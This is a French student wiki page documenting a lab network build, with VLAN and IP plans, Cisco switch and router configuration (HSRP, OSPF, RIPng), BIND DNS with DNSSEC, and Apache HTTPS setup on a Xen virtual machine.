| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Management=====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
